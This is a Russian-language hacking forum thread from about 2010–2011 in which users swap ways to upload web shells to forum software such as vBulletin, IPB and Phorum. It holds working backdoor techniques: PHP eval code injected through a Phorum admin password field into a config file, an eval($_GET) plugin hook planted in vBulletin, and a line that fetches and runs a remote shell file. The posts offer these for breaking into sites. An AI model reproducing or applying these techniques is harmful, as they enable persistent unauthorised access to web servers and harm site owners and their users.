ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
20.03.2010, 20:22
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
есть способы заливки шелла для форума vBulletin 3.8.0 Beta 3 ?!
|
|
|
22.04.2010, 02:49
|
|
Познающий
Регистрация: 30.10.2009
Сообщений: 41
Провел на форуме:
592140
Репутация:
6
|
|
в smf можно сменить директорию в которую заливаются темы ?  |
|
|
|
01.05.2010, 19:29
|
|
Новичок
Регистрация: 19.03.2010
Сообщений: 9
Провел на форуме:
12419
Репутация:
0
|
|
как залить шелл на TorrentPier ??
|
|
|
|
15.05.2010, 13:14
|
|
Участник форума
Регистрация: 10.03.2005
Сообщений: 234
Провел на форуме:
936234
Репутация:
56
|
|
Кто знает еще какие то способы заливки шелла на ipb 2.3.4 ? Через импорт изображения - не проходит - вернее шелл загружен но видимо в директории запрещено выполнение скриптов, вываливается ошибка 500 Internal Server Error, через аватару тоже не проходит - и тип файла добавил и разрешение в аватаре на этот тип добавил, но все равно не загружает.
Заранее спасибо
|
|
|
|
07.06.2010, 20:02
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 10
Провел на форуме:
42585
Репутация:
0
|
|
такой вопрос, залил шелл на IPB NULL, пытаюсь войти и выдаёт 500 Internal Server Error. В чем может быть проблема? Точнее как залить шелл не через стили
Последний раз редактировалось Cherep; 07.06.2010 в 20:06..
|
|
|
|
18.10.2010, 04:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
2549
Репутация:
0
|
|
Отлично Пашкела в + 4 из 3 в держки по думаю в чем косяк, но все же
|
|
|
|
30.03.2011, 06:09
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585
Репутация:
818
|
|
Версия: phorum-3.4.6
Сообщение от None
Copyright (C) 2000 Phorum Development Team
http://www.phorum.org
Нужны права админа.
Наткнулся совершенно случайно, версия оч старая, нагуглил архив, скал, стал изучать исходники, и почти сразу наткнулся на то что конфигурация форума сохраняется в PHP файл:
Код:
Code:
C:\wamp\www\phorum-3.4.6\phorum-3.4.6\admin\settings\forums.php
Что дает нам возможность внедрить в конфиги пару своих строк =)
Последние строки в конфиг файле:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]// database variables
[/COLOR][COLOR="#0000BB"]$PHORUM[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DatabaseServer'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$PHORUM[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DatabaseName'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$PHORUM[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DatabaseUser'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$PHORUM[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DatabasePassword'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]
Чтоб не нарушить структуру файла, идем в раздел Конфигурации БД:
Код:
Code:
http://www.SITE.COM/forum/admin/index.php?page=db
В поле Password: дописываем к текущему паролю строку:
Код:
Code:
'; @eval(stripslashes($_GET['cmd'])); echo '
И получаем бэкдор по пути:
Код:
Code:
http://www.SITE.COM/forum/admin/settings/forums.php
|
|
|
|
18.07.2011, 23:48
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 10
Провел на форуме:
42585
Репутация:
0
|
|
пробывал залить шелл способом пашкеллы. phpinfo показывает, но погда уже прописываю /faq.php?e=wget линк на шелл
пишет
Код:
Code:
Parse error: syntax error, unexpected T_STRING in
public_html/faq.php(324) : eval()'d code(1) : eval()'d code on line 1
код в модуле
Код:
Code:
eval($_GET[e]);
|
|
|
|
19.07.2011, 17:59
|
|
Познающий
Регистрация: 09.04.2009
Сообщений: 82
Провел на форуме:
270788
Репутация:
1
|
|
Сообщение от Pashkela
Pashkela said:
Код:
Code:
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: faq_complete
Код: eval($_GET[e]);
потом шлепаем на http://site.ru/forum/faq.php?e=phpinfo();
льем шелл, возвращаемся в админку, удаляем модуль faq_complete все сделал , захожу http://site.ru/forum/faq.php?e=phpinfo();
а где тут загружать шелл найти не могу. Помогите кто сталкивался
|
|
|
|
19.07.2011, 18:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
34360
Репутация:
1
|
|
Сообщение от tack3r
tack3r said:
все сделал , захожу http://site.ru/forum/faq.php?e=phpinfo();
а где тут загружать шелл найти не могу. Помогите кто сталкивался
Это просто проверка рабоспособности бэкдора, чтобы получить полноценный шелл нужно взять любой шелл и залить его в txt формате в коде убрать в начале После вместо phpinfo(); вставляем
eval(file_get_contents('http://site.com/shell.txt'));
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
